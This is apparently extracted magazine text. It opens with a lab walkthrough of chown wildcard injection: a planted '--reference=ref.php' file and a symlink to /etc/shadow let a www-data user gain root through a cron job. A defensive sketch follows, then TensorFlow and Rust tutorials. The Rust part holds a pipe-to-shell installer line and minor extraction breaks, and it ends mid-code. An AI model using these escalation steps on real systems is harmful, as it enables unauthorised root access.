Get back to your computer and, from a non-privileged meterpreter session, create a new file called ref.php (don’t forget to spawn a shell first): touch ref.php. This file will be created with www-data as its owner, of course. Open a new terminal on your computer, execute vi and save a new empty file named --reference=ref.php (:w --reference=ref.php). Then upload this file to the VM using your meterpreter session (first terminate the active channel with Ctrl+C): upload --reference=ref.php. Spawn a new shell once again and make a symbolic link to /etc/shadow: ln -s /etc/shadow shadow. Wait for a while until the cron job executes. Have a good look at /etc/shadow now… and start panicking! /etc/shadow is now owned by www-data, because the special file you have uploaded to /var/www/html/ has been expanded into an additional flag to the chown command, as follows: chown www-data:www-data --reference=ref.php file1 file2 fileN… The --reference flag uses the owner and group of the file passed as a parameter as a reference to set the owner and group of the rest of the files. Because chown follows symlinks and applies any changes to the actual file pointed to by the symlink, /etc/shadow is now owned by www-data instead of root. Gaining root now is a piece of cake, because you can write to /etc/shadow!
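The root cause of the wildcard trick is that an unquoted * lets file names masquerade as program options. Defensively, scripts should write ./* (so every expanded name starts with a path prefix) or use -- to end option parsing before the glob, and a quick audit can simply look for directory entries whose names begin with a dash. A purely illustrative sketch:

```python
import os

def suspicious_names(directory):
    """Return directory entries that a shell glob such as * would
    expand into something that looks like a command-line option."""
    return sorted(name for name in os.listdir(directory)
                  if name.startswith("-"))

# Safer shell patterns for the cron script above would be:
#   chown www-data:www-data ./*    (names expand as ./--reference=...)
#   chown www-data:www-data -- *   ('--' stops option parsing)
```

Running this over a web root would immediately flag a planted --reference=ref.php file.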

Tutorial TensorFlow: Image Recognition

TensorFlow: Recognise and classify images
Put the power of an open source neural network to work with this example of a use for deep learning

Joey Bernard
In his day job, Joey helps researchers and students at the university level in designing and running HPC projects on supercomputing clusters.

Resources
TensorFlow www.tensorflow.org
Example models https://github.com/tensorflow/models

Neural networks have been around, as an idea, since the very beginning of artificial intelligence research. The problem has always been that it’s very difficult to implement them in an efficient way. This has kept these techniques out of the hands of the average software developer – at least until Google developed a library for its Google Brain internal project. This was released in 2015 as an open source library called TensorFlow. In just a few short years, it’s found its way into a huge number of fields and projects, including convolutional neural networks, audio recognition and image recognition, among others.

Because of its popularity, TensorFlow has been ported to many different platforms – including, most recently, mobile operating systems such as Android and iOS. In this article, we’ll look at how TensorFlow can be used to do image recognition and classification. We’ll look at how to get it installed on your platform, and how to create a basic system setup so that you can do some image processing.

Install TensorFlow
The first step is to get TensorFlow installed on the machine where you will be doing the image-analysis work. For most platforms, you should be able to install it using pip. Because we only have room to talk specifically about one platform here, I’ll assume you’re using a Debian-based Linux distribution. Assuming this, you can install the necessary tools with the following command:

sudo apt-get install python3-pip python3-dev python-virtualenv

In order to keep your Python environment organised, you should create a virtual environment where you can safely install TensorFlow. You can do this with the following.

virtualenv --system-site-packages -p python3 tensorflow

This will create a virtual environment, in the subdirectory named tensorflow, where you can install TensorFlow. You can activate it by sourcing the activation script.

source ~/tensorflow/bin/activate
(tensorflow)$

Your command line prompt should change to the new one seen above. You can now install TensorFlow into the virtual environment with

(tensorflow)$ pip3 install --upgrade tensorflow

This installs the CPU version of the TensorFlow library. However, much of the processing that it does can be farmed out to a GPU for faster results. If you have an Nvidia card, you can use the following commands to install the required CUDA support package and install the GPU version of TensorFlow.

sudo apt-get install cuda-command-line-tools
source ~/tensorflow/bin/activate
pip3 install --upgrade tensorflow-gpu

You should verify that everything installed correctly by running the following tiny piece of code:

import tensorflow as tf
hello_test = tf.constant('Hello from TensorFlow!')
sess = tf.Session()
print(sess.run(hello_test))

You should get the following output.

Hello from TensorFlow!

The core concept of TensorFlow is the graph. Data is imported into variables with some relationship between the elements.
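Before diving into TensorFlow’s own API, the graph idea itself can be sketched in a few lines of plain Python. This toy evaluator is purely illustrative (it is not how TensorFlow is implemented): nodes are either constants or operations over named inputs, and asking for one node evaluates only what that node depends on.

```python
# Each operation node is (function, list_of_input_names);
# anything else in the dict is treated as a constant.
def run_graph(graph, fetch):
    """Recursively evaluate the node called 'fetch' in a dataflow graph."""
    node = graph[fetch]
    if not isinstance(node, tuple):
        return node  # a constant value
    op, inputs = node
    args = [run_graph(graph, name) for name in inputs]
    return op(*args)

graph = {
    "a": 3.0,
    "b": 4.0,
    "sum": (lambda x, y: x + y, ["a", "b"]),
    "double": (lambda x: 2 * x, ["sum"]),
}

print(run_graph(graph, "double"))  # prints 14.0
```

TensorFlow’s engine does the same job at scale: it walks the graph and executes only the operations needed to produce the values you asked for.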

There is also a series of processes that need to be applied to the data. All these processes and relationships are combined to define a dataflow graph. TensorFlow then acts as the engine that traverses these graphs and executes all the operations that have been defined. These features are accessible through the low-level API in TensorFlow, but most people don’t need to work with that much detail, so there is a higher-level API that provides data import functions to manage creation of the data structures from many common data file formats. Then there are a series of functions called estimators. These estimators create entire models, and their underlying graphs, so that you can simply run the estimator to do the data processing that is needed.

Left A neural network consists of an input layer, a number of intermediate (hidden) layers, and an output layer

Inception-v3
One of the tasks for which TensorFlow has shown its usefulness is image recognition, and therefore a lot of work has been done to improve its performance in this area. When you start developing your own algorithms, the work done in the image-recognition estimators would be well worth your time to investigate. One family of image recognition estimators is called Inception, with the most current release being version 3.

The Inception models were trained using a data set called ImageNet, put together in 2012 to act as a standard set to test and compare image-recognition systems. It contains more than 14 million URLs to images that were annotated (by humans) to indicate the objects pictured; there are more than 20 thousand ambiguous categories, with each category, such as ‘roof’ or ‘mushroom’, containing several hundred images.

Luckily, Inception-v3 is a fully trained model that you can download and use to experiment with. Once you have TensorFlow installed, download Inception from the GitHub repository with the following commands:

git clone https://github.com/tensorflow/models.git
cd models/tutorials/image/imagenet

In this folder, you’ll find the Python script classify_image.py. Assuming you haven’t run this script before, and haven’t downloaded the model data at some other time, it will start by downloading the file inception-2015-12-05.tgz so that it has the model data. If you have already downloaded the model, you can indicate this to the script with the command line option --model_dir to specify the directory where it’s stored. Then to have it classify your own images, you can hand them in with the command line option --image_file. To test it, you can use the default image of a panda. When you run it, you should get output like the following.

python ./classify_image.py
giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca (score = 0.89107)
indri, indris, Indri indri, Indri brevicaudatus (score = 0.00779)
lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens (score = 0.00296)
custard apple (score = 0.00147)
earthstar (score = 0.00117)

As you can see, this outputs the top five matches for what TensorFlow thinks your image might be, together with a confidence score (in case you were wondering, an earthstar is a type of fungus!). If you want, you can change the number of returned matches with the command line option --num_top_predictions.

Visualising with TensorBoard
When working with networks and models, it can become difficult to figure out what is actually happening. To help, the developers have provided a tool called TensorBoard to help visualise the learning that is being processed. In order to use it, you need to have your code generate summary data, which can then be read by TensorBoard to produce detailed information for your model.

Tune the net
While the Inception model is very good, it’s designed to be as general as possible and to be able to identify a wide range of categories. But you may want to tune the model to be even better at identifying some smaller subset of types of images. In these cases, you can reuse the bulk of the Inception model and just replace the last layer of the neural network to be specific for your new image category. In the main TensorFlow GitHub repository that you need to download, there is a Python script that gives an example of how to retrain the Inception model, which you can run with the following example code.


python tensorflow/examples/image_retraining/retrain.py --image_dir ~/my_images

This script takes all of the images in the directory my_images and retrains the model using each image. Even this simple retraining process can still take 30 minutes or more. If you were to do a full training of the model, it could take a huge number of hours. There are several other options available, including selecting a different model to act as a starting point. There are other, smaller models that are faster, but not as general. If you’re writing a program to be run on a low-power processor, such as a phone app, you may decide to select one of these instead.

Using TensorFlow Mobile
When you have a model trained and are using it in some project, you have the ability to move it onto what may seem like underpowered hardware by using the TensorFlow Mobile libraries available at the TensorFlow site. This can move very intensive deep-learning applications out to devices such as smartphones or tablets.

Training on new data
While the above example may be fine for the majority of people, there may be cases where you need more control than this. Fortunately, you can manually manage the retraining of your model. The first step is to load the data for the model; the following code lets you do this.

graph = tf.Graph()
with graph.as_default():
    with tf.gfile.FastGFile('classify_image_graph_def.pb', 'rb') as file:
        graph_def = tf.GraphDef()
        graph_def.ParseFromString(file.read())
        tf.import_graph_def(graph_def, name='')

This loads the model and creates a new graph object. The graph is made up of several layers, all leading to a final output layer.

last_layer = graph.get_tensor_by_name('pool_3:0')

This final layer is what does the final classification and makes the ultimate decision as to what it thinks your image is. At this point, you can process your specialised images to create a new final layer. There are several steps required in order to preprocess the images, and then train a new final layer, which can be quite tedious to carry out – but you can shorten the process by using a useful wrapper known as TF-Slim.

As you can see, we have only touched the code necessary in the most cursory way in the material above. We haven’t had the space available to dig into much of the detail that you require in order to get any work done, and indeed this is a well-known complaint people have with TensorFlow. To help alleviate this issue you can use that wrapper layer of code, TF-Slim, to minimise the amount of code that you need in order to get some useful work done. TF-Slim is available in the contrib portion of the installed TensorFlow package, and you can import it with the following code:

import tensorflow.contrib.slim as slim

With the TF-Slim module loaded, a lot of the boilerplate code that needs to be written when working in TensorFlow is wrapped and taken care of for you. In TF-Slim, models are defined by a combination of variables, layers and scopes. In regular TensorFlow, creation of variables requires quite a bit of initialisation on whichever device the data is being stored and used on. TF-Slim wraps all of this so that it’s simplified to become a single function call. For example, the following code creates a regular variable containing a series of zeroes.

my_var = slim.variable('my_var', shape=[20, 1],
    initializer=tf.zeros_initializer())

Getting the list of variables in the model is also simplified to the following.

regular_variables_and_model_variables = slim.get_variables()

Below There’s a complete tutorial available as an IPython notebook in the models repository for TensorFlow

Building layers for a neural network under TF-Slim is also greatly simplified. In plain TensorFlow code, creating a single convolutional layer can take seven lines of code. In TF-Slim, this collapses down to the following two lines of code.

input = ...
net = slim.conv2d(input, 128, [3, 3], scope='conv1_1')
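As a reminder of the shape arithmetic behind a layer like that slim.conv2d call: TensorFlow computes a convolution’s spatial output size as ceil(input/stride) with ‘SAME’ padding (TF-Slim’s default) and ceil((input - kernel + 1)/stride) with ‘VALID’ padding. A tiny sanity-check helper, illustrative only and not part of TF-Slim:

```python
import math

def conv_output_size(input_size, kernel, stride=1, padding="SAME"):
    """Spatial output size of a 2D convolution, per TensorFlow's rules."""
    if padding == "SAME":
        return math.ceil(input_size / stride)
    if padding == "VALID":
        return math.ceil((input_size - kernel + 1) / stride)
    raise ValueError("padding must be 'SAME' or 'VALID'")

# A 3x3, stride-1, SAME-padded convolution keeps a 224-pixel side at 224.
print(conv_output_size(224, 3))              # 224
print(conv_output_size(224, 3, 2))           # SAME, stride 2 -> 112
print(conv_output_size(224, 3, 1, "VALID"))  # 222
```

Keeping this arithmetic in mind makes it much easier to see why swapping the final layer of a network works: the earlier layers’ output shapes don’t change.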

TF-Slim also includes 13 other built-in options for layers, including fully connected and unit norm layers. It even simplifies creating multiple layers with a repeat function. For example, the following code creates three convolutional layers.

net = slim.repeat(net, 3, slim.conv2d, 256, [3, 3], scope='conv3')

This makes the task of retraining a given model to be more finely tuned much easier. You can use these wrapper functions to create a new layer with only a few lines of code and replace the final layer of an already built model. Luckily, there is a very good example of how you can do this, which is available within the models section of the TensorFlow source repository at GitHub. There is a complete set of Python scripts written to help with each of the steps we’ve already discussed. There are scripts to manage converting image data to the TensorFlow TFRecord data format, as well as scripts to automate the retraining of image recognition models. There is even an IPython notebook, called slim_walkthrough.ipynb, that takes you through the creation of a new neural network, training it on a given dataset, and the final application of the neural network on production data.

Above TensorFlow has a layered structure, building up from a core graph execution engine all the way up to high-level estimators. The diagram shows canned estimators and Keras models (‘models in a box’) sitting on the Estimator API used to train and evaluate models; below that, the Layers API used to build models; then the Python, C++ and other front-ends; and, at the bottom, the TensorFlow distributed execution engine targeting CPU, GPU, Android, iOS and more.

Training a new layer
Once you have a new layer constructed, or perhaps you have created an entirely new neural network from scratch, you still have to train this new layer. In order to retrain a given network, you need to create a starting point with the following code.

model_path = '/path/to/pre_trained_on_imagenet.checkpoint'
variables_to_restore = slim.get_variables_to_restore(...)
init_fn = assign_from_checkpoint_fn(model_path, variables_to_restore)

Once you have this starting point, you can start the retraining with the code below.

train_op = slim.learning.create_train_op(...)
log_dir = '/path/to/my_model_dir/'
slim.learning.train(train_op, log_dir, init_fn=init_fn)

You can then run this newly created model to get it to do actual work. To help, the TF-Slim code repository includes a script called evaluation.py to help you do this processing step. If you have something specific that you need to do, you can use this script as a starting point to write your own workflow scripts.

Performance implications
The developers behind TensorFlow have put a lot of work into making the final, trained models fairly snappy in terms of performance. This is one of the reasons why deep learning and neural networks have been exploding in popularity recently. There is still one area that has performance problems, however: the training of the models in the first place. For example, training the Inception image-recognition model takes weeks of processing time. This is why quite a bit of development time has been put into including GPU support for this stage of TensorFlow usage – and it’s also why you should use a pre-trained model, such as the Inception model we’ve been discussing, whenever you have the opportunity.

The Inception-v3 model took weeks to train, even with 50 GPUs crunching the network data. When you are doing your own training, there are a few things you can do to help with performance. One of them is to try to bundle your file I/O into larger chunks. Accessing the hard drive is one of the slowest processes on a computer; if you can take multiple files and combine them into larger collections, reading them is made more efficient. The second option you have is to use fused operations in the actual training step. This takes multiple processing operations and combines them into single fused operations, to minimise function-call overhead.

Where next?
We’ve only been able to cover the process of image recognition and retraining of neural networks in the most superficial way in this tutorial. There are a large number of complicated steps involved in working with these types of models. My hope is that this short article has been able to highlight the overall concepts, and includes enough external resources to help point you to sources of the details you would need to be able to add this functionality to your own projects.

Tutorial Introduction to Rust

Rust: An introduction to
safe systems programming
Learn some of the safety features inside one of the best-loved programming languages today

John Gowers
John is a university tutor in Programming and Computer Science. He likes to install Linux on every device he can get his hands on and has extensive programming experience.

Resources
Rust and Cargo installation (details are included in the article)

Above If you’re familiar with C, it shouldn’t take long to get to grips with Rust

Rust, in a nutshell, is a safe C. Developed in the last 10-12 years under the sponsorship of Mozilla, it quickly took on a number of safety features that are directly useful within software engineering projects. At its heart, it’s a systems programming language just as C is, but it combines low-level access to the machine with elegant features, such as strong typing and ownership, that help Rust programmers avoid bugs and memory leaks much more effectively than they could in C – or in similar languages such as C++.

Today, Rust is hugely popular, owing to its elegance and robustness. In fact, it was named the most-loved language in the Stack Overflow developer survey in 2016, 2017 and 2018.

Getting started
We’ll assume that you know a bit about systems programming in C/C++. Much of the syntax of Rust is the same as that of C; where there are differences, they are for the purpose of making the language safer and less prone to error than C, directly targeting common problems such as null pointers and memory leaks. We hope that you’ll gain some appreciation of what Rust does and how it can help us catch bugs much earlier than other languages.

To start, we need to install the Rust compiler on our system. In order to download it manually, you can visit https://sh.rustup.rs, which will automatically download a shell script, rustup-init.sh. Running this script will install Rust on your system. You can perform installation in a single command as follows:

$ curl https://sh.rustup.rs/ | sh

Alternatively, your distribution’s package manager might have a Rust package on it already. If that’s the case, it’s a good idea to install Rust using it. This will give you a more robust installation, and will help you keep track of Rust on your system.

We’ll start with a simple “Hello world” program. Open a command window, create a folder somewhere on your system in order to hold the code, and navigate to it. We’ll also need to fire up a text editor to write our code. Create a file called hello.rs inside the folder we’ve just created, and add the following code to it.
fn main() {
    println!("Hello, world!");
}

If you’re used to C you’ll notice some similarities, but a number of differences as well. To start, notice that the function that runs when the program starts is called main, as it is in C, and that the syntax is broadly the same. Some differences include the keyword fn to declare a function (which is not part of C) and the exclamation mark ! after the function println. This exclamation mark in fact means that println is not a normal function but a macro, but we don’t need to worry about that for now.

Go into the command window, and type the following to compile your program.

$ rustc hello.rs

This creates an executable, which we can run in the normal way:

$ ./hello
Hello, world!

Package management with Cargo
Almost all Rust projects use the special built-in package-management system called Cargo. If you installed Rust using the installation script, it will already be installed. If you installed Rust from your package manager, there’s a chance that you will have to install Cargo separately. You can check whether Cargo is installed by running the following command.

$ cargo --version

Cargo is incredibly useful for keeping track of dependencies in projects. In order to turn our Rust project into a Cargo project, we’ll need to go through a few extra steps. First, let’s go back a directory, using $ cd ... Then use the following command to create a new directory that will hold our Cargo project.

$ cargo new hello_cargo --bin
     Created binary (application) 'hello_cargo' project
$ cd hello_cargo

Look at the contents of this directory with $ ls and you’ll see that it contains a file called Cargo.toml and a directory called src. The src directory already contains a file, main.rs, that is exactly the same as the hello.rs that we created earlier. In fact, we can run it straight away from inside the hello_cargo directory using the command cargo run. We won’t be using the capabilities of Cargo in this tutorial, but it’s a good idea to get into the habit of using it so you can take advantage of it later on.

Figure 1: number data types
8-bit integer: i8 (signed), u8 (unsigned)
16-bit integer: i16 (signed), u16 (unsigned)
32-bit integer: i32 (signed), u32 (unsigned)
64-bit integer: i64 (signed), u64 (unsigned)
Platform-sized integer (64-bit or 32-bit): isize (signed), usize (unsigned)
32-bit float: f32
64-bit float: f64

Left Rust provides good support for many different integer and floating point types, so you are never left guessing about how many bits your data takes up

Variables and typing
Strong typing is central to the safety features provided by Rust. In a weakly typed language such as C, the compiler will happily accept code like this:

int x = 'A' * 'B' / 'C';
printf("%c\n", x);

Multiplying and dividing characters shouldn’t make sense, and neither should putting them into integer values. Weak typing is sometimes useful, but on the whole it tends to obscure bugs in the code. If we have code in which we are multiplying character values together, it is very likely that we are making a mistake. If the compiler allows us to do this without complaining, we could be unaware of that mistake until much later on, when it might be a lot more difficult to track down. Rust is considered ‘safe’ precisely because it stops you doing things that shouldn’t make sense.

For example, let’s go into the file main.rs inside the src directory and add the following lines of code into the main function.

let letter_a = 'A';
let letter_b = 'B';
let product = letter_a * letter_b;

When we try to compile this code using cargo run, Rust will display a clear error message:
by Rust. In C, it is perfectly legal to write code like this: $ cargo run

www.linuxuser.co.uk 53
Tutorial Introduction to Rust

$ cargo run
   Compiling hello_cargo v0.1.0
error[E0369]: binary operation '*' cannot be applied to type 'char'

Rust is telling us that we cannot use the multiplication operation to multiply two character values. However, if we use numeric values rather than characters, Rust will allow us to perform the multiplication. Replace all the code inside the main function with the following.

    let number_seven = 7;
    let number_thirteen = 13;
    let product = number_seven * number_thirteen;
    println!("{} x {} = {}.", number_seven, number_thirteen, product);

Running cargo run should now give us the correct output, like this:

7 x 13 = 91.

We've introduced a few new things here, so let's go over them. In order to create a variable in Rust, we use the let keyword, followed by the variable name, followed by an equals sign = and the initial value. The initialisation is optional, but is usually a good idea, since Rust uses the initial value in order to work out what type the variable should have. For example, the variable number_seven is initialised to the number 7, so Rust automatically gives it the type i32, which is the type of a 32-bit signed integer. If we want to tell Rust which type to use, rather than letting it work it out for itself, we can add a type annotation to the variable declaration. For example:

    let large_number: u64 = 1000;

The type u64 is the type of unsigned 64-bit integers. There is a full list of Rust's different integer and floating-point types in Figure 1. Rust is good at stopping you, for example, from declaring an unsigned-type variable to be equal to -1. It will give you a warning if you try to initialise a variable with a value that overflows its bounds.

Sometimes, Rust is unable to infer the type of a variable, and will give an error message to that effect. In these cases, giving a type annotation is mandatory. However, Rust is quite well set up in order to ensure that this is not necessary most of the time.

The other new thing is the println! syntax. A bit like C's printf, println! enables us to insert placeholders {} into our string whose values are filled in according to the other parameters to the function. These parameters can be strings, characters or numbers. For example, the following command

    println!("L{}n{}x {}", 1, 'u', "User");

prints out the string L1nux User.

Figure 2: Rust supports basic looping constructs. We can break out of any loop using the break keyword, as in C.

    loop {
        println!("Again!");
    }

    Again!
    Again!
    Again!
    ...

    let mut i = 5;
    while i <= 8 {
        println!("{}!", i);
        i = i + 1;
    }

    5!
    6!
    7!
    8!

Figure 3: for loops are the most common type of loop used in Rust.

    for i in 1..5 {
        println!("{}!", i * 2);
    }
    println!("Who do we appreciate?");

    2!
    4!
    6!
    8!
    Who do we appreciate?

Using external crates
You might wonder why we went to the trouble of turning our project into a Cargo project. Well, Cargo is a powerful tool, which is why it's so widespread. One use for it is to quickly install new code packages, called 'crates', so that we can use them in our code.
For example, let's install a crate that will enable us to generate random numbers. The crate in question is called rand, and is provided in the Cargo repositories. To ensure it's installed, we need to modify the Cargo.toml file in our project directory. If it isn't there already, add a single line containing the text [dependencies] at the bottom, followed by the line rand = "0.4". If we run cargo run, Cargo should install the rand crate.
To use the crate in our code, we need to add the following line to the top of main.rs: extern crate rand;. This line is necessary in order to load the crate. Then, below this line, add the line use rand::Rng; to bring the Rng module into scope. Now we can call rand::thread_rng().gen(); inside our code to generate a random integer.

mut and shadowing
So far, variables in Rust seem to be the same as the ones we would find in C. But try replacing the contents of the main function with the following.

    let x = 2;
    x = 3;
When we try to compile this code using cargo run, Rust gets angry and presents us with the error message cannot assign twice to immutable variable. What this illustrates is that variables in Rust are immutable by default – that is, they hold one particular value and cannot be assigned to more than once.

The reason for this is that immutable variables are much safer in general than mutable ones, especially in complex multithreaded systems, where changes in the values of variables make the behaviour of the system much harder to reason about. We recommend that you stick to immutable variables as far as possible.

Nevertheless, sometimes mutable variables are useful. An example is the while loop in Figure 2. To tell Rust that a variable should be mutable, we use the mut keyword.

    let mut i = 0;
    i = 1; // Compiles fine.

An alternative to using mut is what Rust calls 'shadowing'. Shadowing is when we use the same name for two different variables in the same scope. For example:

    let x = 0;
    let x = 1;

Here, the second line let x = 1; creates a new variable called x and assigns it the value 1. From this point, whenever we refer to x in the code, we are referring to the second variable (unless we shadow again and produce a third variable called x). Functionally, there is no difference between this and calling the second variable y or something else: we do it in order to avoid having to think up new variable names. Since it is impossible to refer to the original variable x once we have shadowed it, you should treat shadowing as a more limited form of mutability: you can imagine that the variable x has changed value from 0 to 1, as long as you remember that they are in fact two separate immutable variables.

You should use shadowing rather than mut if you have the chance, since it avoids introducing actual mutable variables. Shadowing is, however, less powerful than mutability: indeed, it is nothing more than syntactic sugar for immutable variables. The while loop in Figure 2 doesn't work with shadowing, because in this case the condition i <= 8 refers to the original i, rather than the shadowed value.

Functions
No systems programming language would be complete without the ability to write our own functions. We have already seen one example of a function: the main() function that runs when the program starts. main() does not take any input, but we can also write functions that take in values as parameters. For example, we could write the little program shown in Figure 4, which prints out the two solutions to a quadratic equation (assuming that equation has only real solutions).

Figure 4: Rust requires us to give type signatures for parameters to a function, so that we don't need to give them elsewhere.

    fn solve_quadratic_equation(a: f64, b: f64, c: f64) {
        let d = (b * b) - (4.0 * a * c);
        println!("The first solution is {}", (-b + d.sqrt()) / (2.0 * a));
        println!("The second solution is {}", (-b - d.sqrt()) / (2.0 * a));
    }

    fn main() {
        solve_quadratic_equation(1.0, -5.0, 6.0);
    }

One thing that is important to notice is that the parameters to a function must always take type signatures. Here, we have required that the numbers a, b and c be 64-bit floating point types. One reason for this restriction is that the main tool Rust uses to infer types of variables is by looking at when they are passed into or out of functions. So, by forcing us to specify types of function parameters, Rust is better able to enable us not to include them elsewhere. For example, when we call solve_quadratic_equation(1.0, -5.0, 6.0); Rust knows that the number 5.0 should be a 64-bit float precisely because we have included the type signature in the function.

Figure 5: The idiomatic way to return a value from a function in Rust is to put the 'return value' as the last statement in the function, without a semicolon.

    fn solve_quadratic_equation(a: f64, b: f64, c: f64) -> (f64, f64) {
        let d = (b * b) - (4.0 * a * c);
        let first_solution = (-b + d.sqrt()) / (2.0 * a);
        let second_solution = (-b - d.sqrt()) / (2.0 * a);
        (first_solution, second_solution)
    }

    fn main() {
        let (solution_1, solution_2) = solve_quadratic_equation(1.0, -5.0, 6.0);
        println!("{} {}", solution_1, solution_2);
    }

Control-flow statements
While we haven't mentioned them much here, Rust has plenty of control-flow statements; the looping constructs are illustrated in Figures 2 and 3. The simplest looping construct is loop, which starts an infinite loop. The while loop is slightly more sophisticated, and loops round as long as a specified Boolean condition is true. The for loop can be used to iterate over collections such as arrays and ranges.

We can also return values from functions. The syntax for this is a bit different from that used in C, and is more similar to that of functional languages such as Haskell. We use the arrow -> to specify the return value of a function. For example, in Figure 5 we have a modified version of the quadratic equation function from Figure 4

that returns the values rather than print them. Here, we have used one of Rust's special tuple types in order to return a pair of floating point values.

Notice that we do not need to use a return statement to return the value; it suffices to put the value that we want to return on the last line of the function, without a semicolon. Rust also supports a return statement like the one in C if we want to return values in the middle of a function's code.

Enums and match
Rust enables us to create enum types that can take on a specified set of values. One useful thing we can do with enums is to match on their values: that is, if we have a variable v of a particular enum type, we can specify what to do for every value that v could take on. There's an example in Figure 6: the cmp() function returns a value of the enum type Ordering, which has three values: Less, Equal and Greater. The match keyword tells us what to do in each of these cases.

Figure 6: A match statement is more reliable than an if/else if/else construct, because it guarantees that every possibility is dealt with.

    use std::cmp::Ordering;

    fn print_sign(x: i32) {
        match x.cmp(&0) {
            Ordering::Less => println!("Negative!"),
            Ordering::Equal => println!("Zero!"),
            Ordering::Greater => println!("Positive!"),
        }
    }

Ownership
So far we have not explored any safety features that really make Rust special. Plenty of languages, for example, are strongly typed. Ownership is a new Rust concept; it is quite hard to grasp, but can make programs much safer. The idea is that when we have some dynamically allocated memory on the heap, exactly one variable 'owns' that memory at any one time, and the lifetime of that variable controls when the memory is allocated and freed.

In C, we can dynamically allocate memory on the heap by using the function malloc.

    void *new_memory = malloc(1000 * sizeof(int));

When we have finished with the memory, we should call free(new_memory) to avoid taking up too many of the system's resources. Memory allocation is notoriously difficult in C, because it is hard to keep track of memory and to know when it is okay to free it. If we free memory and then try to use it, or if we try to free memory twice, the program will crash.

Some languages, such as Java, get around this problem by using a garbage collector to automate the freeing of memory. But this approach can lead to large performance overheads, which we want to avoid with a systems programming language. Rust adopts a different approach: there is no garbage collector, but memory is still freed automatically.

The way that Rust avoids the problems of having multiple variables all pointing to the same memory address is simple: you can only ever have one variable pointing to a particular piece of memory.

Figure 7: Whenever a function takes in a pointer/box variable as a parameter, it takes ownership over the bytes that the variable points to.

    fn steal_ownership(x: Box<i32>) {
        println!("{} stolen!", x);
    }

    fn main() {
        let current_year = Box::new(2018);
        steal_ownership(current_year);
        println!("{}", current_year); // Doesn't compile!
    }

Let's illustrate this with an example. In Rust, we can use the function String::from to dynamically allocate some memory for holding a resizable string.

    let magazine_name = "LU&D"; // fixed-length string
    let magazine_name = String::from(magazine_name); // variable-length string

Here, we have used shadowing to avoid having to come up with separate names for the two string variables, but there is an important difference between the two: the first magazine_name is a string literal that occupies a fixed area of memory on the stack. It is, therefore, impossible to change the size of this string. The second magazine_name is dynamically allocated on the heap, which means that it can support a number of string-manipulation functions.

Now add the following lines of code at the end.

    let best_magazine = magazine_name;
    println!("{}", magazine_name);

If we run this code with cargo run, Rust gives us an error message. The reason is that when we ran the line let best_magazine = magazine_name, Rust transferred ownership of the string "LU&D" from the variable magazine_name to the variable best_magazine, meaning that the variable magazine_name is now invalid.

This might seem like strange behaviour, but it has an important purpose: it means that Rust can now automatically free the bytes that best_magazine points
to as soon as that variable goes out of scope. Other languages can't do this, because there's always a chance that some other variable is pointing to the same bytes. In Rust, on the other hand, there is a guarantee that such a situation can never occur, since it is impossible for two variables to point to the same data; as soon as we point a new variable to a piece of data, it automatically invalidates the old pointer.

This is a bit like C++'s unique_ptr: if we have two unique_ptr pointers, we cannot set one to be equal to the other, but must instead use the move function, which invalidates the first pointer. The difference is that 'invalidate' here means that the first pointer is set to null, so that attempting to de-reference it later on will result in a segmentation fault at runtime. By contrast, de-referencing an invalidated pointer in Rust causes a compiler error, helping us to catch bugs much earlier on.

Passing values
Another way that ownership is transferred is by passing values to functions. If we have a variable that points to some bytes on the heap and we pass it into a function, the parameter inside that function takes ownership of the variable. Let's look at an example; for a change, we'll use Rust's Box::new instead of String::from. Box::new allocates some memory, initialising it to a given value, and returns the 'boxed value' – that is, a variable pointing to that memory.

The code in Figure 7 includes a function, steal_ownership, that takes a boxed integer as a parameter. The function does not actually do anything much with the parameter, but the fact that it takes in the value means that it also takes ownership of the bytes that it points to (which have the value 2018). When the function returns, x goes out of scope and the memory will be freed. This means that the code as it stands will not compile, because the last println! statement refers to current_year after it has been invalidated.

Figure 8: Returning values from functions can restore ownership back to the calling context.

    fn borrow_ownership(x: Box<i32>) -> Box<i32> {
        println!("{} borrowed!", x);
        x
    }

    fn main() {
        let current_year = Box::new(2018);
        let current_year = borrow_ownership(current_year);
        println!("{}", current_year);
    }

We can stop this from happening by returning the value back from the function, as in Figure 8. When we return a pointer value, we transfer ownership back to the calling context. In this case, we have returned x, which gets put into the new (shadowed) variable current_year in the main() function.

This is fine, but it can be a bit annoying if we also want to return separate values from the function. Luckily, Rust provides a way of passing pointer values to functions that does not transfer ownership. For this we use something called a reference, which is a bit like a 'borrowed value': it allows us to look at the contents of the box, but does not transfer ownership. Figure 9 shows a more concise version of the code in Figure 8 using references. In order to signify that a parameter to a function is a reference, we need to put an ampersand & in front of the parameter name, and we also need an & in front of the name of the variable we are passing in (in this case, current_year).

Figure 9: References are the idiomatic way to 'borrow' a pointer/box variable: they allow us to read the value that the variable points to without taking ownership.

    fn borrow_ownership(x: &Box<i32>) {
        println!("{} borrowed!", x);
    }

    fn main() {
        let current_year = Box::new(2018);
        borrow_ownership(&current_year);
        println!("{}", current_year);
    }

Mutable references
If you use references to pass values to functions without transferring ownership, you might notice that you can't modify these values within the functions. This is a deliberate design decision: since we can have multiple references pointing to the same piece of data, it could cause problems if individual references were allowed to modify this data, particularly in a multi-threaded environment where individual threads are reading from the same data source.
However, sometimes we do want to change the value held at a particular reference, and we can do this by using a mutable reference. To make a reference mutable, we add the keyword mut, just as we do for variables. For example, we could change the declaration of the parameter in Figure 9 from x: &Box<i32> to x: &mut Box<i32>.
Since allowing references to be mutable introduces problems when there are multiple references pointing to the same bytes, Rust is very restrictive about the use of mutable references. The rule is that if a particular piece of data has a mutable reference pointing to it, there must be no other references to that data in the same scope. That way, we can freely modify the bytes that the reference points to without worrying that there might be another reference trying to read that data.

There's obviously a lot more to Rust than we can cover in this introduction, but hopefully it has given you a taste of what this excellent language can do.
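To consolidate the ideas above, here is a short recap sketch of our own (it is not one of the magazine's listings, and all the function and variable names in it are our own inventions). It combines type signatures, a tuple return, shadowing, an immutable borrow and a mutable borrow in one compilable program.

```rust
// Recap sketch (our own example, not from the tutorial listings).

// Type signatures on the parameters; the tuple is returned by the
// final expression, which has no semicolon.
fn min_max(a: f64, b: f64) -> (f64, f64) {
    if a < b { (a, b) } else { (b, a) }
}

// An immutable reference: we read the boxed value without taking
// ownership, so the caller's variable stays valid afterwards.
fn peek(x: &Box<i32>) -> i32 {
    **x
}

// A mutable reference: the function changes the caller's value
// in place, again without taking ownership.
fn add_one(x: &mut i32) {
    *x += 1;
}

fn main() {
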